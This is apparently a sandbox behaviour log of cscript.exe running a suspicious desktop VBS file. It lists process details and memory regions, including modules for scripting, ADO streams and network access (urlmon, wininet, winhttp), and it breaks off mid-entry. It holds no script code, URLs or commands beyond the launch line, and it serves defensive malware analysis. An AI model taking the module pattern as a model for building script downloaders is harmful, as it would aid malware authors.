# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Dec 5 2017 14:47:56 # Log Creation Date: 05.12.2017 15:56:52.711 Process: id = "1" image_name = "cscript.exe" filename = "c:\\windows\\system32\\cscript.exe" page_root = "0x72c72000" os_pid = "0xe98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\MSC000~1.VBS\" " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013d92" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2 start_va = 0xc468480000 end_va = 0xc46849ffff entry_point = 0x0 region_type = private name = "private_0x000000c468480000" filename = "" Region: id = 3 start_va = 0xc4684a0000 end_va = 0xc4684b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c4684a0000" filename = "" Region: id = 4 start_va = 0xc4684c0000 end_va = 0xc4685bffff entry_point = 0x0 region_type = private name = "private_0x000000c4684c0000" filename = "" Region: id = 5 start_va = 0xc4685c0000 end_va = 0xc4685c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c4685c0000" filename = "" Region: id = 6 start_va = 0xc4685d0000 end_va = 0xc4685d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c4685d0000" filename = "" Region: id = 7 start_va = 0xc4685e0000 end_va = 0xc4685e1fff entry_point = 0x0 region_type = private name = "private_0x000000c4685e0000" filename = "" Region: id = 8 start_va = 0x7df5ff070000 end_va = 0x7ff5ff06ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff070000" filename = "" Region: id = 9 start_va = 0x7ff76ff10000 end_va = 0x7ff76ff32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff76ff10000" filename = "" Region: id = 10 start_va = 0x7ff76ff3a000 end_va = 0x7ff76ff3afff entry_point = 0x0 region_type = private name = "private_0x00007ff76ff3a000" filename = "" Region: id = 11 start_va = 0x7ff76ff3e000 end_va = 0x7ff76ff3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff76ff3e000" filename = "" Region: id = 12 start_va = 0x7ff770f20000 end_va = 0x7ff770f4efff entry_point = 0x7ff770f20000 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 13 start_va = 0x7ffb3d310000 end_va = 0x7ffb3d4d1fff entry_point = 0x7ffb3d310000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 153 start_va = 0xc4687c0000 end_va = 0xc4688bffff entry_point = 0x0 region_type = private name = "private_0x000000c4687c0000" filename = "" Region: id = 154 start_va = 0x7ffb3a800000 end_va = 0x7ffb3a9dcfff entry_point = 0x7ffb3a800000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 155 start_va = 0x7ffb3d260000 end_va = 0x7ffb3d30cfff entry_point = 0x7ffb3d260000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 230 start_va = 0xc468480000 end_va = 0xc46848ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468480000" filename = "" Region: id = 231 start_va = 0xc468490000 end_va = 0xc468496fff entry_point = 0x0 region_type = private name = "private_0x000000c468490000" filename = "" Region: id = 232 start_va = 0xc4685f0000 end_va = 0xc4686adfff entry_point = 0xc4685f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 233 start_va = 0xc4686b0000 end_va = 0xc4687affff entry_point = 0x0 region_type = private name = "private_0x000000c4686b0000" filename = "" Region: id = 234 start_va = 0x7ff76fe10000 end_va = 0x7ff76ff0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff76fe10000" filename = "" Region: id = 235 start_va = 0x7ff76ff3c000 end_va = 0x7ff76ff3dfff entry_point = 0x0 region_type = private name = "private_0x00007ff76ff3c000" filename = "" Region: id = 236 start_va = 0x7ffb318d0000 end_va = 0x7ffb318d9fff entry_point = 0x7ffb318d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 237 start_va = 0x7ffb3bf80000 end_va = 0x7ffb3c0a5fff entry_point = 0x7ffb3bf80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 238 start_va = 0x7ffb3c2d0000 end_va = 0x7ffb3c375fff entry_point = 0x7ffb3c2d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 239 start_va = 0x7ffb3c3e0000 end_va = 0x7ffb3c564fff entry_point = 0x7ffb3c3e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 240 start_va = 0x7ffb3c650000 end_va = 0x7ffb3c79dfff entry_point = 0x7ffb3c650000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 241 start_va = 0x7ffb3c950000 end_va = 0x7ffb3c9aafff entry_point = 0x7ffb3c950000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 242 start_va = 0x7ffb3c9b0000 end_va = 0x7ffb3ca6dfff entry_point = 0x7ffb3c9b0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 243 start_va = 0x7ffb3cb20000 end_va = 0x7ffb3cc60fff entry_point = 0x7ffb3cb20000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 244 start_va = 0x7ffb3cc70000 end_va = 0x7ffb3ceebfff entry_point = 0x7ffb3cc70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 245 start_va = 0x7ffb3cf10000 end_va = 0x7ffb3cfacfff entry_point = 0x7ffb3cf10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 246 start_va = 0xc4687b0000 end_va = 0xc4687b6fff entry_point = 0x0 region_type = private name = "private_0x000000c4687b0000" filename = "" Region: id = 247 start_va = 0xc4689f0000 end_va = 0xc4689fffff entry_point = 0x0 region_type = private name = "private_0x000000c4689f0000" filename = "" Region: id = 248 start_va = 0xc468a00000 end_va = 0xc468b87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468a00000" filename = "" Region: id = 249 start_va = 0x7ffb3c290000 end_va = 0x7ffb3c2c5fff entry_point = 0x7ffb3c290000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 250 start_va = 0x7ffb3d020000 end_va = 0x7ffb3d17bfff entry_point = 0x7ffb3d020000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 251 start_va = 0xc4688c0000 end_va = 0xc4688c2fff entry_point = 0xc4688c0000 region_type = mapped_file name = "cscript.exe.mui" filename = "\\Windows\\System32\\en-US\\cscript.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cscript.exe.mui") Region: id = 252 start_va = 0xc4688d0000 end_va = 0xc4688d0fff entry_point = 0x0 region_type = private name = "private_0x000000c4688d0000" filename = "" Region: id = 253 start_va = 0xc4688e0000 end_va = 0xc4688e0fff entry_point = 0x0 region_type = private name = "private_0x000000c4688e0000" filename = "" Region: id = 254 start_va = 0xc468b90000 end_va = 0xc468d10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468b90000" filename = "" Region: id = 255 start_va = 0xc468d20000 end_va = 0xc46a11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468d20000" filename = "" Region: id = 256 start_va = 0xc4688f0000 end_va = 0xc4689c5fff entry_point = 0xc4688f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 257 start_va = 0x7ffb39d60000 end_va = 0x7ffb39d6efff entry_point = 0x7ffb39d60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 258 start_va = 0x7ffb39b90000 end_va = 0x7ffb39bfafff entry_point = 0x7ffb39b90000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 259 start_va = 0x7ffb38610000 end_va = 0x7ffb386a5fff entry_point = 0x7ffb38610000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 260 start_va = 0xc4688f0000 end_va = 0xc46895ffff entry_point = 0x0 region_type = private name = "private_0x000000c4688f0000" filename = "" Region: id = 261 start_va = 0xc46a120000 end_va = 0xc46a456fff entry_point = 0xc46a120000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 262 start_va = 0xc4688f0000 end_va = 0xc4688f8fff entry_point = 0xc4688f0000 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 263 start_va = 0xc468950000 end_va = 0xc46895ffff entry_point = 0x0 region_type = private name = "private_0x000000c468950000" filename = "" Region: id = 264 start_va = 0x7ffb39c00000 end_va = 0x7ffb39c97fff entry_point = 0x7ffb39c00000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 265 start_va = 0xc46a460000 end_va = 0xc46a55ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a460000" filename = "" Region: id = 266 start_va = 0x7ff76ff38000 end_va = 0x7ff76ff39fff entry_point = 0x0 region_type = private name = "private_0x00007ff76ff38000" filename = "" Region: id = 267 start_va = 0xc468900000 end_va = 0xc468900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468900000" filename = "" Region: id = 268 start_va = 0xc46a560000 end_va = 0xc46a617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c46a560000" filename = "" Region: id = 269 start_va = 0xc468900000 end_va = 0xc468903fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468900000" filename = "" Region: id = 270 start_va = 0x7ffb37f40000 end_va = 0x7ffb37f61fff entry_point = 0x7ffb37f40000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 271 start_va = 0xc468910000 end_va = 0xc468910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468910000" filename = "" Region: id = 272 start_va = 0x7ffb3ca70000 end_va = 0x7ffb3cb14fff entry_point = 0x7ffb3ca70000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 273 start_va = 0xc468920000 end_va = 0xc468920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468920000" filename = "" Region: id = 274 start_va = 0x7ffb250a0000 end_va = 0x7ffb25131fff entry_point = 0x7ffb250a0000 region_type = mapped_file name = "vbscript.dll" filename = "\\Windows\\System32\\vbscript.dll" (normalized: "c:\\windows\\system32\\vbscript.dll") Region: id = 275 start_va = 0x7ffb30da0000 end_va = 0x7ffb30daffff entry_point = 0x7ffb30da0000 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 276 start_va = 0x7ffb30d60000 end_va = 0x7ffb30d7cfff entry_point = 0x7ffb30d60000 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 277 start_va = 0xc468930000 end_va = 0xc468931fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468930000" filename = "" Region: id = 278 start_va = 0x7ffb2bea0000 end_va = 0x7ffb2beaffff entry_point = 0x7ffb2bea0000 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 279 start_va = 0x7ffb3a630000 end_va = 0x7ffb3a7f0fff entry_point = 0x7ffb3a630000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 280 start_va = 0x7ffb39d40000 end_va = 0x7ffb39d50fff entry_point = 0x7ffb39d40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 281 start_va = 0x7ffb3a460000 end_va = 0x7ffb3a4b3fff entry_point = 0x7ffb3a460000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 282 start_va = 0x7ffb39610000 end_va = 0x7ffb39626fff entry_point = 0x7ffb39610000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 283 start_va = 0x7ffb39b60000 end_va = 0x7ffb39b87fff entry_point = 0x7ffb39b60000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 284 start_va = 0x7ffb39260000 end_va = 0x7ffb39292fff entry_point = 0x7ffb39260000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 285 start_va = 0x7ffb39780000 end_va = 0x7ffb3978afff entry_point = 0x7ffb39780000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 286 start_va = 0xc468930000 end_va = 0xc468931fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468930000" filename = "" Region: id = 287 start_va = 0xc46a620000 end_va = 0xc46a71ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a620000" filename = "" Region: id = 288 start_va = 0x7ff76ff36000 end_va = 0x7ff76ff37fff entry_point = 0x0 region_type = private name = "private_0x00007ff76ff36000" filename = "" Region: id = 289 start_va = 0x7ffb30d00000 end_va = 0x7ffb30d0bfff entry_point = 0x7ffb30d00000 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 290 start_va = 0x7ffb3c5e0000 end_va = 0x7ffb3c64efff entry_point = 0x7ffb3c5e0000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 291 start_va = 0xc46a720000 end_va = 0xc46b71ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c46a720000" filename = "" Region: id = 292 start_va = 0xc468940000 end_va = 0xc468941fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468940000" filename = "" Region: id = 293 start_va = 0xc46a720000 end_va = 0xc46a81ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a720000" filename = "" Region: id = 294 start_va = 0x7ff76ff34000 end_va = 0x7ff76ff35fff entry_point = 0x0 region_type = private name = "private_0x00007ff76ff34000" filename = "" Region: id = 295 start_va = 0x7ffb2ef00000 end_va = 0x7ffb2ef1cfff entry_point = 0x7ffb2ef00000 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 296 start_va = 0x7ffb3aa50000 end_va = 0x7ffb3bf74fff entry_point = 0x7ffb3aa50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 297 start_va = 0x7ffb39de0000 end_va = 0x7ffb3a407fff entry_point = 0x7ffb39de0000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 298 start_va = 0x7ffb24ff0000 end_va = 0x7ffb25099fff entry_point = 0x7ffb24ff0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll") Region: id = 299 start_va = 0x7ffb3a9f0000 end_va = 0x7ffb3aa40fff entry_point = 0x7ffb3a9f0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 300 start_va = 0x7ffb3a570000 end_va = 0x7ffb3a622fff entry_point = 0x7ffb3a570000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 301 start_va = 0x7ffb39d90000 end_va = 0x7ffb39dd9fff entry_point = 0x7ffb39d90000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 302 start_va = 0x7ffb39d70000 end_va = 0x7ffb39d82fff entry_point = 0x7ffb39d70000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 303 start_va = 0xc468960000 end_va = 0xc4689effff entry_point = 0x0 region_type = private name = "private_0x000000c468960000" filename = "" Region: id = 304 start_va = 0xc468940000 end_va = 0xc468946fff entry_point = 0x0 region_type = private name = "private_0x000000c468940000" filename = "" Region: id = 305 start_va = 0x7ffb24fa0000 end_va = 0x7ffb24fe3fff entry_point = 0x7ffb24fa0000 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll") Region: id = 306 start_va = 0xc468930000 end_va = 0xc46893ffff entry_point = 0x0 region_type = private name = "private_0x000000c468930000" filename = "" Region: id = 307 start_va = 0xc46a820000 end_va = 0xc46a91ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a820000" filename = "" Region: id = 308 start_va = 0x7ffb23ca0000 end_va = 0x7ffb23d79fff entry_point = 0x7ffb23ca0000 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 309 start_va = 0x7ffb39350000 end_va = 0x7ffb3936efff entry_point = 0x7ffb39350000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 310 start_va = 0xc468960000 end_va = 0xc468961fff entry_point = 0xc468960000 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 311 start_va = 0xc4689e0000 end_va = 0xc4689effff entry_point = 0x0 region_type = private name = "private_0x000000c4689e0000" filename = "" Region: id = 312 start_va = 0x7ffb38c60000 end_va = 0x7ffb38c82fff entry_point = 0x7ffb38c60000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 313 start_va = 0x7ffb23a60000 end_va = 0x7ffb23c96fff entry_point = 0x7ffb23a60000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 314 start_va = 0xc46a920000 end_va = 0xc46aa9ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a920000" filename = "" Region: id = 315 start_va = 0xc46a920000 end_va = 0xc46aa5ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a920000" filename = "" Region: id = 316 start_va = 0xc46aa90000 end_va = 0xc46aa9ffff entry_point = 0x0 region_type = private name = "private_0x000000c46aa90000" filename = "" Region: id = 317 start_va = 0xc468960000 end_va = 0xc4689cffff entry_point = 0x0 region_type = private name = "private_0x000000c468960000" filename = "" Region: id = 318 start_va = 0xc46aaa0000 end_va = 0xc46ac6ffff entry_point = 0x0 region_type = private name = "private_0x000000c46aaa0000" filename = "" Region: id = 319 start_va = 0xc46a920000 end_va = 0xc46aa4ffff entry_point = 0x0 region_type = private name = "private_0x000000c46a920000" filename = "" Region: id = 320 start_va = 0xc46aa50000 end_va = 0xc46aa5ffff entry_point = 0x0 region_type = private name = "private_0x000000c46aa50000" filename = "" Region: id = 321 start_va = 0xc46a920000 end_va = 0xc46a9fefff entry_point = 0xc46a920000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 322 start_va = 0xc46aa40000 end_va = 0xc46aa4ffff entry_point = 0x0 region_type = private name = "private_0x000000c46aa40000" filename = "" Region: id = 323 start_va = 0xc46ac70000 end_va = 0xc46b06ffff entry_point = 0x0 region_type = private name = "private_0x000000c46ac70000" filename = "" Region: id = 324 start_va = 0xc468960000 end_va = 0xc468960fff entry_point = 0xc468960000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 325 start_va = 0xc4689c0000 end_va = 0xc4689cffff entry_point = 0x0 region_type = private name = "private_0x000000c4689c0000" filename = "" Region: id = 326 start_va = 0xc46aaa0000 end_va = 0xc46ab9ffff entry_point = 0x0 region_type = private name = "private_0x000000c46aaa0000" filename = "" Region: id = 327 start_va = 0xc46ac60000 end_va = 0xc46ac6ffff entry_point = 0x0 region_type = private name = "private_0x000000c46ac60000" filename = "" Region: id = 328 start_va = 0xc46b070000 end_va = 0xc46b16ffff entry_point = 0x0 region_type = private name = "private_0x000000c46b070000" filename = "" Region: id = 329 start_va = 0xc46b170000 end_va = 0xc46b26ffff entry_point = 0x0 region_type = private name = "private_0x000000c46b170000" filename = "" Region: id = 330 start_va = 0x7ff76fe0a000 end_va = 0x7ff76fe0bfff entry_point = 0x0 region_type = private name = "private_0x00007ff76fe0a000" filename = "" Region: id = 331 start_va = 0x7ff76fe0c000 end_va = 0x7ff76fe0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff76fe0c000" filename = "" Region: id = 332 start_va = 0x7ff76fe0e000 end_va = 0x7ff76fe0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff76fe0e000" filename = "" Region: id = 333 start_va = 0x7ffb23920000 end_va = 0x7ffb23a56fff entry_point = 0x7ffb23920000 region_type = mapped_file name = "msado15.dll" filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll") Region: id = 334 start_va = 0x7ffb25f00000 end_va = 0x7ffb25f24fff entry_point = 0x7ffb25f00000 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 335 start_va = 0x7ffb253b0000 end_va = 0x7ffb253d8fff entry_point = 0x7ffb253b0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 336 start_va = 0x7ffb38f70000 end_va = 0x7ffb38f8bfff entry_point = 0x7ffb38f70000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 337 start_va = 0x7ffb24e20000 end_va = 0x7ffb24e54fff entry_point = 0x7ffb24e20000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 338 start_va = 0xc468970000 end_va = 0xc46897ffff entry_point = 0xc468970000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 339 start_va = 0x7ffb2ea50000 end_va = 0x7ffb2ebe6fff entry_point = 0x7ffb2ea50000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 340 start_va = 0x7ffb31aa0000 end_va = 0x7ffb31e15fff entry_point = 0x7ffb31aa0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 341 start_va = 0x7ffb2e5a0000 end_va = 0x7ffb2e846fff entry_point = 0x7ffb2e5a0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 342 start_va = 0x7ffb26110000 end_va = 0x7ffb2614cfff entry_point = 0x7ffb26110000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 343 start_va = 0x7ffb39960000 end_va = 0x7ffb3998bfff entry_point = 0x7ffb39960000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 344 start_va = 0xc468970000 end_va = 0xc468970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c468970000" filename = "" Region: id = 345 start_va = 0xc468980000 end_va = 0xc468980fff entry_point = 0xc468980000 region_type = mapped_file name = "counters.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 346 start_va = 0x7ffb3c570000 end_va = 0x7ffb3c5d8fff entry_point = 0x7ffb3c570000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 347 start_va = 0x7ffb3a9e0000 end_va = 0x7ffb3a9e7fff entry_point = 0x7ffb3a9e0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 348 start_va = 0x7ffb2ec80000 end_va = 0x7ffb2ec94fff entry_point = 0x7ffb2ec80000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 349 start_va = 0x7ffb373f0000 end_va = 0x7ffb373fafff entry_point = 0x7ffb373f0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 350 start_va = 0x7ffb37410000 end_va = 0x7ffb37447fff entry_point = 0x7ffb37410000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 351 start_va = 0x7ffb333f0000 end_va = 0x7ffb334c5fff entry_point = 0x7ffb333f0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 352 start_va = 0x7ffb395b0000 end_va = 0x7ffb3960cfff entry_point = 0x7ffb395b0000 region_type = 